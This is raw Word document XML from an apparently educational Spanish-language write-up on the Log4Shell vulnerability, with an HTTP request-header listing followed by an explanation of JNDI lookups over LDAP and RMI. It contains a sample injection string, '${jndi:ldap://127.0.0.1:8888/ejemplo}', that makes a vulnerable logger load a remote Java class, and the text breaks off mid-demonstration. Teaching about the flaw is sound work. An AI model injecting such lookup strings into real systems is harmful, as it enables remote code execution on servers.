          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: " </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Not;A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sec-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ua</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-mobile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: ?0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sec-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ua</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-platform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: "Windows"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sec-Fetch-Site: none</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sec-Fetch-Mode: navigate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sec-Fetch-User</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: ?1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sec-Fetch-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00541BBB" w:rsidRDefault="00541BBB" w:rsidP="00541BB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</w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Accept-Encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>deflate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00541BBB" w:rsidRDefault="00541BBB" w:rsidP="00541BB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color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>-Language: es-US</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>,es</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>-419;q=0.9,es;q=0.8,en;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRDefault="00541BBB" w:rsidP="00541BBB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color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Explicación de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00B1448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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">o grave </w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:t>de la</w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilidad </w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">og4Shell, es poder ejecutar </w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:t>código</w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el sistema que </w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> usando el log</w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:t>, es decir en un servidor we</w:t>
      </w:r>
      <w:r>
        <w:t>b que será víctima de un ataque, de una forma bastante simple.</w:t>
      </w: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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Esto se </w:t>
      </w:r>
      <w:r>
        <w:t>consigue</w:t>
      </w:r>
      <w:r w:rsidR="00B14487">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> usando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>prot</w:t>
      </w:r>
      <w:r>
        <w:t>ocolos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>LDAP o RMI:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12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</w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">LDAP: </w:t>
      </w:r>
      <w:r>
        <w:t>Ofrece una organización estructurada de objetos, a la que se puede realizar consultas, muy utilizado empresarialmente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E1231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rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RMI: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Es un protocolo para ejecución y acceso a código remoto en Java. </w:t>
      </w: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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ambos </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">permiten </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">exportar una clase de java, que se </w:t>
      </w:r>
      <w:r>
        <w:t>instancian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> y ejecutara </w:t>
      </w:r>
      <w:r w:rsidR="00B14487">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>en una maquina ajena que lo solicite. E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s decir si por ejemplo guardamos un log de la </w:t>
      </w:r>
      <w:r>
        <w:t>siguiente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> forma</w:t>
      </w:r>
      <w:r w:rsidR="00B14487">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (con una versión log4j vulnerable)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B14487" w:rsidRPr="00B14487" w:rsidRDefault="00B14487" w:rsidP="00B14487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rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Mi usuario es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>://127.0.0.1:8888/ejemplo}</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Se </w:t>
      </w:r>
      <w:r>
        <w:t>conecta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> al servidor </w:t>
      </w:r>
      <w:r w:rsidR="00B14487">
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00B14487">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r>
        <w:t>descarga</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> una clase </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r w:rsidR="00B14487">
        <w:t>posiblemente maliciosa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> que ejecutar </w:t>
      </w:r>
      <w:r>
        <w:t>en el contexto de la aplicación (</w:t>
      </w:r>
      <w:r w:rsidR="00B14487">
        <w:t>el servidor web en casi todo el caso</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Específicamente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ejecutará</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:r>
        <w:t>código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de la c</w:t>
      </w:r>
      <w:r>
        <w:t>lase maliciosa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, para </w:t>
      </w:r>
      <w:r w:rsidR="00B14487">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">intentar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">obtener </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>una cadena de texto que guardar en el log. E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n dicho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estará el código que se ejecutará en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC100E" w:rsidRDefault="00DC100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</w:pPr>
    </w:p>
    <w:p w:rsidR="00444E6F" w:rsidRDefault="00DC100E" w:rsidP="00DC100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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5733415" cy="1752600"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="2" name="1 Imagen" descr="2022 01 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 01 2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6F" w:rsidRDefault="00444E6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</w:pP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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Veamos </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nuestro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">ejemplo y como ciertamente se </w:t>
      </w:r>
      <w:r w:rsidR="00DC100E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>intenta conectar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC100E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">al servidor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">(omitimos la parte del </w:t>
      </w:r>
      <w:r>
        <w:t>envío y la creación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la clase maliciosa)</w:t>
      </w:r>
      <w:r w:rsidR="007A2261">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2261" w:rsidRDefault="007A2261" w:rsidP="007A2261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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Iniciamos </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2261">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>SimpleJavaServer.cmd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2261" w:rsidRDefault="007A2261" w:rsidP="007A2261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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Iniciamos </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2261">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Log4ShellEjemplo1.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2261" w:rsidRPr="002178D6" w:rsidRDefault="007A2261" w:rsidP="002178D6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Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002178D6">
        <w:t xml:space="preserve">Utilizamos la cadena </w:t>
      </w:r>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Mi usuario es ${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>://127.0.0.1:8888/ejemplo}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2261" w:rsidRDefault="002178D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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ejecución</w:t>
      </w:r>
      <w:r w:rsidR="00671FD5">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidRPr="002178D6">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
